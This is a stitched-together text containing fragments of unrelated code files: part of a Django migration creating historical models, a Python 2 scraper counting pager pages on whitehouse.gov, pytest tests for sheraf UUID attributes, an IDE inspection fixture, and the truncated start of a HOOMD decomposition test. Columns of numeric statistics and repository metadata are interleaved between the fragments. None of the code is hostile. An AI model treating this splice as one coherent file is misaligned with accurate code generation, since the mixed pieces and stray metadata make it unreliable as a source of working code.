        migrations.CreateModel(
            name='HistoricalBody',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.TextField()),
                ('short_name', models.CharField(max_length=50)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('center', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                             on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                             to='mainapp.Location')),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('outline', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                              on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                              to='mainapp.Location')),
            ],
            options={
                'verbose_name': 'historical body',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalConsultation',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('title', models.TextField(blank=True, null=True)),
                ('authoritative', models.NullBooleanField()),
                ('role', models.CharField(blank=True, max_length=200, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('meeting', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                              on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                              to='mainapp.Meeting')),
                ('paper', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                            on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                            to='mainapp.Paper')),
            ],
            options={
                'verbose_name': 'historical consultation',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalFile',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.CharField(max_length=200)),
                ('storage_filename', models.CharField(max_length=200)),
                ('displayed_filename', models.CharField(max_length=200)),
                ('mime_type', models.CharField(max_length=255)),
                ('legal_date', models.DateField(blank=True, null=True)),
                ('sort_date', models.DateTimeField(blank=True, editable=False)),
                ('filesize', models.IntegerField()),
                ('page_count', models.IntegerField(blank=True, null=True)),
                ('parsed_text', models.TextField(blank=True, null=True)),
                ('license', models.CharField(blank=True, max_length=200, null=True)),
                ('description', models.TextField(blank=True, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical file',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalLegislativeTerm',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.TextField()),
                ('short_name', models.CharField(max_length=50)),
                ('start', models.DateField()),
                ('end', models.DateField()),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical legislative term',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalLocation',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.TextField()),
                ('short_name', models.CharField(max_length=50)),
                ('description', models.TextField(blank=True, null=True)),
                ('is_official', models.BooleanField()),
                ('osm_id', models.BigIntegerField(blank=True, null=True)),
                ('geometry', djgeojson.fields.GeometryField(default=None)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical location',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalMeeting',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.TextField()),
                ('short_name', models.CharField(max_length=50)),
                ('cancelled', models.BooleanField()),
                ('start', models.DateTimeField()),
                ('end', models.DateTimeField(blank=True, null=True)),
                ('public', models.IntegerField(blank=True, choices=[(0, 'unknown'), (1, 'public'), (2, 'not public'),
                                                                    (3, 'splitted')], default=0)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('invitation', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                 on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                                 to='mainapp.File')),
                ('location', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                               on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                               to='mainapp.Location')),
                ('results_protocol', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                       on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                                       to='mainapp.File')),
                ('verbatim_protocol', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                        on_delete=django.db.models.deletion.DO_NOTHING,
                                                        related_name='+', to='mainapp.File')),
            ],
            options={
                'verbose_name': 'historical meeting',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalOrganization',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.TextField()),
                ('short_name', models.CharField(max_length=50)),
                ('start', models.DateField(blank=True, null=True)),
                ('end', models.DateField(blank=True, null=True)),
                ('color', models.CharField(blank=True, max_length=6, null=True)),
                ('logo', models.CharField(blank=True, max_length=255, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('body', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                           on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                           to='mainapp.Body')),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('location', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                               on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                               to='mainapp.Location')),
                ('organization_type', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                        on_delete=django.db.models.deletion.DO_NOTHING,
                                                        related_name='+', to='mainapp.OrganizationType')),
            ],
            options={
                'verbose_name': 'historical organization',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalOrganizationMembership',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('start', models.DateField(blank=True, null=True)),
                ('end', models.DateField(blank=True, null=True)),
                ('role', models.CharField(blank=True, max_length=200, null=True)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('organization', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                   on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                                   to='mainapp.Organization')),
                ('person', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                             on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                             to='mainapp.Person')),
            ],
            options={
                'verbose_name': 'historical organization membership',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalPaper',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.TextField()),
                ('short_name', models.CharField(max_length=50)),
                ('reference_number', models.CharField(max_length=50)),
                ('description', models.TextField(blank=True, null=True)),
                ('legal_date', models.DateField(blank=True, null=True)),
                ('sort_date', models.DateTimeField(blank=True, editable=False)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('change_request_of', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                        on_delete=django.db.models.deletion.DO_NOTHING,
                                                        related_name='+', to='mainapp.HistoricalPaper')),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('main_file', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                                to='mainapp.File')),
                ('paper_type', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                                 on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                                 to='mainapp.PaperType')),
            ],
            options={
                'verbose_name': 'historical paper',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalPerson',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('name', models.CharField(max_length=100)),
                ('given_name', models.CharField(max_length=50)),
                ('family_name', models.CharField(max_length=50)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
                ('location', models.ForeignKey(blank=True, db_constraint=False, null=True,
                                               on_delete=django.db.models.deletion.DO_NOTHING, related_name='+',
                                               to='mainapp.Location')),
            ],
            options={
                'verbose_name': 'historical person',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalSearchPoi',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('displayed_name', models.CharField(max_length=1000)),
                ('osm_id', models.BigIntegerField(blank=True, null=True)),
                ('osm_amenity', models.CharField(max_length=1000, null=True)),
                ('geometry', djgeojson.fields.GeometryField(null=True)),
                ('exclude_from_search', models.BooleanField(default=False)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical search poi',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
        migrations.CreateModel(
            name='HistoricalSearchStreet',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('oparl_id', models.CharField(blank=True, db_index=True, max_length=255, null=True)),
                ('created', models.DateTimeField(blank=True, editable=False)),
                ('modified', models.DateTimeField(blank=True, editable=False)),
                ('deleted', models.BooleanField(default=False)),
                ('displayed_name', models.CharField(max_length=1000)),
                ('osm_id', models.BigIntegerField(blank=True, null=True)),
                ('exclude_from_search', models.BooleanField(default=False)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type',
                 models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Gelöscht')], max_length=1)),
                ('history_user',
                 models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+',
                                   to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'verbose_name': 'historical search street',
                'ordering': ('-history_date', '-history_id'),
                'get_latest_by': 'history_date',
            },
        ),
    ]
| 63.337079
| 120
| 0.532872
| 2,551
| 28,185
| 5.695414
| 0.071345
| 0.062565
| 0.034827
| 0.051483
| 0.898548
| 0.890701
| 0.864409
| 0.853465
| 0.850506
| 0.847477
| 0
| 0.009902
| 0.322796
| 28,185
| 444
| 121
| 63.47973
| 0.751297
| 0.002413
| 0
| 0.753425
| 1
| 0
| 0.149641
| 0.016575
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011416
| 0
| 0.018265
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1a434c4de65db64b3cbe62c4dd93090fd4774829
| 2,227
|
py
|
Python
|
Python_Scripts/pages.py
|
jmausolf/White_House_Speeches
|
b0590cc2362f2452a6d9bec977161095b5231e03
|
[
"MIT"
] | 1
|
2021-04-19T10:19:27.000Z
|
2021-04-19T10:19:27.000Z
|
Python_Scripts/pages.py
|
jmausolf/White_House_Speeches
|
b0590cc2362f2452a6d9bec977161095b5231e03
|
[
"MIT"
] | null | null | null |
Python_Scripts/pages.py
|
jmausolf/White_House_Speeches
|
b0590cc2362f2452a6d9bec977161095b5231e03
|
[
"MIT"
] | null | null | null |
##################################
### ###
### Joshua G. Mausolf ###
### Computation Institute ###
### University of Chicago ###
### ###
##################################
def pages(url):
    """Return the number of additional pages for a given parent URL.

    Fetches *url*, finds the ``div.item-list`` pager block and counts its
    ``li.pager-item`` entries.  Returns 0 when the page has no pager.
    """
    import urllib2, sys
    from bs4 import BeautifulSoup

    # Base Page
    soup = BeautifulSoup(urllib2.urlopen(url).read())

    # Page Counter (may be None when the listing fits on one page)
    page_counter = soup.find("div", {"class": "item-list"})
    try:
        # Collect the text of every pager item; its count is the number of
        # extra pages beyond the current one.
        paragraph = ["".join(x.findAll(text=True))
                     for x in page_counter.findAll("li", {"class": "pager-item"})]
        return len(paragraph)
    except AttributeError:
        # page_counter is None -> no pager on this page.  Catching only
        # AttributeError (instead of a bare except) lets network/parse
        # errors propagate instead of being silently swallowed.
        return 0
def pages_current(url):
    """Return the number of ``pager-current`` entries for a given parent URL.

    Same structure as ``pages`` but counts ``li.pager-current`` elements
    inside the ``div.item-list`` pager.  Returns 0 when no pager exists.
    """
    import urllib2, sys
    from bs4 import BeautifulSoup

    # Base Page
    soup = BeautifulSoup(urllib2.urlopen(url).read())

    # Page Counter (may be None when the listing fits on one page)
    page_counter = soup.find("div", {"class": "item-list"})
    try:
        paragraph = ["".join(x.findAll(text=True))
                     for x in page_counter.findAll("li", {"class": "pager-current"})]
        return len(paragraph)
    except AttributeError:
        # page_counter is None -> no pager; only AttributeError is expected
        # here, so other failures are no longer hidden by a bare except.
        return 0
def sub_pages_URLs(parent_url):
    """Append the subpage URLs of *parent_url* to ``subpages.csv``.

    The function creates a list of subpages given a parent URL.
    It makes use of the pages(url) function.
    """
    base_url = parent_url + "?page="

    # Number of Pages
    total_pages = pages(parent_url)

    # BUGFIX: the original opened the file inside ``try`` and closed it in
    # ``finally`` — if open() itself failed, ``f`` was unbound and the
    # finally clause raised NameError, masking the real error.  ``with``
    # both closes the file reliably and avoids that failure mode.
    with open('subpages.csv', 'a') as f:
        for i in range(0, total_pages + 1):
            sub_page_url = base_url + str(i)
            f.write(u'%s\n' % (sub_page_url))
def sub_pages_URLs_current(parent_url):
    """Append the subpage URLs of *parent_url* to ``subpages.csv``.

    The function creates a list of subpages given a parent URL.
    It makes use of the pages_current(url) function.
    """
    base_url = parent_url + "?page="

    # Number of Pages
    total_pages = pages_current(parent_url)

    # BUGFIX: ``with`` replaces the old try/finally that called f.close()
    # even when open() failed (NameError masking the original exception).
    with open('subpages.csv', 'a') as f:
        for i in range(0, total_pages + 1):
            sub_page_url = base_url + str(i)
            f.write(u'%s\n' % (sub_page_url))
#sub_pages_URLs_current("https://www.whitehouse.gov/briefing-room/Speeches-and-Remarks")
| 27.493827
| 114
| 0.580602
| 288
| 2,227
| 4.364583
| 0.284722
| 0.071599
| 0.031822
| 0.030231
| 0.844869
| 0.844869
| 0.844869
| 0.790772
| 0.790772
| 0.790772
| 0
| 0.007268
| 0.258644
| 2,227
| 80
| 115
| 27.8375
| 0.754088
| 0.281545
| 0
| 0.8
| 0
| 0
| 0.079973
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.1
| 0
| 0.3
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1aa89979f630b5e201d2d61f3c58dafd210feed6
| 2,561
|
py
|
Python
|
tests/attributes/test_uuid.py
|
yaal-fr/sheraf
|
9821a53d8b0ea0aba420175e4cfa81529262f88c
|
[
"MIT"
] | 1
|
2020-03-18T09:54:52.000Z
|
2020-03-18T09:54:52.000Z
|
tests/attributes/test_uuid.py
|
yaal-fr/sheraf
|
9821a53d8b0ea0aba420175e4cfa81529262f88c
|
[
"MIT"
] | null | null | null |
tests/attributes/test_uuid.py
|
yaal-fr/sheraf
|
9821a53d8b0ea0aba420175e4cfa81529262f88c
|
[
"MIT"
] | null | null | null |
import numbers
import uuid
import pytest
import sheraf
import tests
def test_uuid_is_not_autocreated(sheraf_database):
    """A UUIDAttribute left unset stays None after model creation."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.UUIDAttribute()

    with sheraf.connection():
        instance = UUIDModel.create()
        assert instance.my_uuid is None
def test_reset_uuid_to_none(sheraf_connection):
    """A stored UUID can be cleared by assigning None."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.UUIDAttribute()

    instance = UUIDModel.create()
    instance.my_uuid = uuid.uuid4()

    instance = UUIDModel.read(instance.id)
    assert isinstance(instance.my_uuid, uuid.UUID)

    instance.my_uuid = None
    instance = UUIDModel.read(instance.id)
    assert instance.my_uuid is None
def test_bad_uuid(sheraf_connection):
    """Assigning a string that is not a valid UUID raises ValueError."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.UUIDAttribute()

    instance = UUIDModel.create()
    with pytest.raises(ValueError):
        instance.my_uuid = "yolo"
def test_create_with_an_existing_uuid(sheraf_database):
    """A uuid.UUID given at creation is stored numerically, read back as UUID."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.UUIDAttribute()

    with sheraf.connection():
        instance = UUIDModel.create(my_uuid=uuid.uuid4())
        assert isinstance(instance.mapping["my_uuid"], numbers.Number)
        assert isinstance(instance.my_uuid, uuid.UUID)
def test_create_with_an_existing_uuid_str(sheraf_database):
    """A UUID given as a string at creation is stored numerically, read back as UUID."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.UUIDAttribute()

    with sheraf.connection():
        instance = UUIDModel.create(my_uuid=str(uuid.uuid4()))
        assert isinstance(instance.mapping["my_uuid"], numbers.Number)
        assert isinstance(instance.my_uuid, uuid.UUID)
def test_create_with_an_existing_uuid_int(sheraf_database):
    """A UUID given as its integer form is stored numerically, read back as UUID."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.UUIDAttribute()

    with sheraf.connection():
        instance = UUIDModel.create(my_uuid=uuid.uuid4().int)
        assert isinstance(instance.mapping["my_uuid"], numbers.Number)
        assert isinstance(instance.my_uuid, uuid.UUID)
def test_string_uuid_attribute(sheraf_database):
    """StringUUIDAttribute stores numerically but exposes the value as str."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.StringUUIDAttribute()

    with sheraf.connection():
        instance = UUIDModel.create(my_uuid=uuid.uuid4().int)
        assert isinstance(instance.mapping["my_uuid"], numbers.Number)
        assert isinstance(instance.my_uuid, str)
def test_reset_str_uuid_to_none(sheraf_connection):
    """A StringUUIDAttribute holding a value can also be reset to None."""

    class UUIDModel(tests.UUIDAutoModel):
        my_uuid = sheraf.StringUUIDAttribute()

    instance = UUIDModel.create()
    instance.my_uuid = uuid.uuid4()

    instance = UUIDModel.read(instance.id)
    assert isinstance(instance.my_uuid, str)

    instance.my_uuid = None
    instance = UUIDModel.read(instance.id)
    assert instance.my_uuid is None
| 26.677083
| 63
| 0.699336
| 335
| 2,561
| 5.128358
| 0.125373
| 0.104773
| 0.057043
| 0.14901
| 0.896973
| 0.896973
| 0.893481
| 0.87078
| 0.829453
| 0.795693
| 0
| 0.002913
| 0.195627
| 2,561
| 95
| 64
| 26.957895
| 0.831068
| 0
| 0
| 0.738462
| 0
| 0
| 0.012495
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.123077
| false
| 0
| 0.076923
| 0
| 0.446154
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
64c131c0abcaf0ae4c03e11dc8fd75e05503c60d
| 261
|
py
|
Python
|
python/testData/inspections/PyGlobalUndefinedInspection/severalGlobals.py
|
tgodzik/intellij-community
|
f5ef4191fc30b69db945633951fb160c1cfb7b6f
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/inspections/PyGlobalUndefinedInspection/severalGlobals.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2022-02-19T09:45:05.000Z
|
2022-02-27T20:32:55.000Z
|
python/testData/inspections/PyGlobalUndefinedInspection/severalGlobals.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
def foo():
global <weak_warning descr="Global variable 'var' is undefined at the module level">var</weak_warning>
var = 1
def bar():
global <weak_warning descr="Global variable 'var' is undefined at the module level">var</weak_warning>
var = 2
| 32.625
| 106
| 0.704981
| 40
| 261
| 4.5
| 0.425
| 0.244444
| 0.188889
| 0.244444
| 0.922222
| 0.922222
| 0.922222
| 0.922222
| 0.922222
| 0.922222
| 0
| 0.009434
| 0.187739
| 261
| 8
| 107
| 32.625
| 0.839623
| 0
| 0
| 0.333333
| 0
| 0
| 0.412214
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
64dc112bb90b4b3a79a943bb2485181dfda3398d
| 22,364
|
py
|
Python
|
hoomd/test-py/test_communication.py
|
PetersResearchGroup/PCND
|
584768cc683a6df0152ead69b567d05b781aab2b
|
[
"BSD-3-Clause"
] | 2
|
2020-03-30T14:38:50.000Z
|
2020-06-02T05:53:41.000Z
|
hoomd/test-py/test_communication.py
|
PetersResearchGroup/PCND
|
584768cc683a6df0152ead69b567d05b781aab2b
|
[
"BSD-3-Clause"
] | null | null | null |
hoomd/test-py/test_communication.py
|
PetersResearchGroup/PCND
|
584768cc683a6df0152ead69b567d05b781aab2b
|
[
"BSD-3-Clause"
] | 1
|
2020-05-20T07:00:08.000Z
|
2020-05-20T07:00:08.000Z
|
# -*- coding: iso-8859-1 -*-
# Maintainer: mphoward
from hoomd import *
import hoomd;
context.initialize()
import unittest
## Domain decomposition balancing tests
class decomposition_tests (unittest.TestCase):
## Test that no errors are raised if a uniform decomposition should be done
def test_uniform(self):
if comm.get_num_ranks() > 1:
box = data.boxdim(L=10)
boxdim = box._getBoxDim()
# test the default constructor, which should make a uniform decomposition
comm.decomposition()
dd = hoomd.context.current.decomposition._make_cpp_decomposition(boxdim)
self.assertEquals(len(dd.getCumulativeFractions(0)), 3)
self.assertEquals(len(dd.getCumulativeFractions(1)), 3)
self.assertEquals(len(dd.getCumulativeFractions(2)), 3)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(0)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[0], 0.0)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[1], 0.5)
self.assertAlmostEquals(dd.getCumulativeFractions(1)[2], 1.0)
self.assertAlmostEquals(dd.getCumulativeFractions(2)[0], 0.0)
